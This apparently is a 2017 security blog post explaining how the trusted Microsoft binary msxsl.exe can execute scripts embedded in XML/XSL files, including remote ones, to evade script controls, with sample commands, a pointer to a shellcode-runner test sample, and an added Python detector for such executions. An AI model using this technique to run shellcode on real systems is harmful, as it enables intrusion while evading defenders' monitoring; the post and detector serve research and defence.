Friday, August 25, 2017

msxsl.exe Working As Designed.

So, I was recently exploring XSL and XSL injection, and came across several interesting references.

<msxsl:script> Element

XSLT Script Block Sample

The basic gist, and what I think is interesting, is that you can host and execute scripts inside trusted, signed binaries that ingest XML.

So, here is an example, a tool called msxsl.exe.

You can download it here:

1. start /b msxsl.exe customers.xml report.xsl
2. start /b msxsl.exe report.xsl
3. start /b msxsl.exe customers.xml

The sample commands above just show a very basic example. If you look at the parameters accepted, either the XML or the XSL file can be a URL.

So, msxsl.exe, while not installed by default, may exist in your fleet, and it packs a powerful punch. It is a trusted binary that can be used to bypass some script controls.

Here again, you have a tool that is working as designed, yet has functionality that can easily circumvent many controls.

By that I mean execution events are likely not being noticed, and it allows you to load and execute VBS/JS and more.
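As an added example (not part of the original post), here is a small Python detector run over constructed process-creation log lines: it flags every msxsl.exe execution, since the tool is not present by default, and raises the severity when the XML or XSL argument is a URL, which is exactly what the parameters above permit. The Sysmon-style key=value log format, file paths and example.invalid URLs are assumptions made for the illustration.

```python
import re
import shlex
from urllib.parse import urlparse

# Constructed sample of process-creation telemetry (Sysmon Event ID 1 style,
# flattened to key=value pairs); made-up lines, not real logs from any fleet.
SAMPLE_EVENTS = [
    'Image=C:\\Tools\\msxsl.exe CommandLine="msxsl.exe customers.xml report.xsl" ParentImage=C:\\Windows\\System32\\cmd.exe',
    'Image=C:\\Users\\alice\\AppData\\Local\\Temp\\msxsl.exe CommandLine="msxsl.exe http://example.invalid/customers.xml http://example.invalid/report.xsl" ParentImage=C:\\Windows\\System32\\cmd.exe',
    'Image=C:\\Windows\\System32\\notepad.exe CommandLine="notepad.exe report.xsl" ParentImage=C:\\Windows\\explorer.exe',
    'Image=C:\\Tools\\MSXSL.EXE CommandLine="MSXSL.EXE report.xsl" ParentImage=C:\\Windows\\System32\\cmd.exe',
]

FIELD_RE = re.compile(r'(\w+)=("([^"]*)"|(\S+))')   # key="quoted value" or key=value
REMOTE_SCHEMES = {"http", "https", "ftp"}

def parse_event(line):
    """Turn one key=value line into a dict; quoted values may contain spaces."""
    return {m.group(1): m.group(3) if m.group(3) is not None else m.group(4)
            for m in FIELD_RE.finditer(line)}

def is_remote(arg):
    """True when an msxsl argument points at a URL rather than a local file."""
    return urlparse(arg).scheme.lower() in REMOTE_SCHEMES

def analyse_event(event):
    """Return a finding for an msxsl.exe execution, or None for any other process."""
    image = event.get("Image", "")
    if image.rsplit("\\", 1)[-1].lower() != "msxsl.exe":
        return None
    # posix=False keeps Windows paths intact (no backslash escaping); quotes are stripped by hand
    args = [a.strip('"') for a in shlex.split(event.get("CommandLine", ""), posix=False)][1:]
    remote = [a for a in args if is_remote(a)]
    return {
        "image": image,
        "parent": event.get("ParentImage", ""),
        "args": args,
        "remote_args": remote,
        # msxsl.exe is not shipped by default, so any execution is worth a look;
        # an XML/XSL argument fetched over the network is the stronger signal.
        "severity": "high" if remote else "medium",
    }

def scan(lines):
    """Run every event through the analyser and keep only the msxsl.exe findings."""
    return [f for f in (analyse_event(parse_event(line)) for line in lines) if f]
```

Calling `scan(SAMPLE_EVENTS)` yields three findings: two medium (local files only) and one high (both arguments fetched over HTTP), with notepad.exe ignored.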

I recently updated a sample you can use for testing. Using the amazing DotNetToJscript, all you need to do is update the base64 shellcode here, and you can execute in the context of msxsl.exe. Keep in mind it is a 32-bit application.

MSXSL Test Cases

You could easily base64 encode and deliver this script host runner too. It's small but packs a big punch ;-)


That's all. Short and simple.


Casey Smith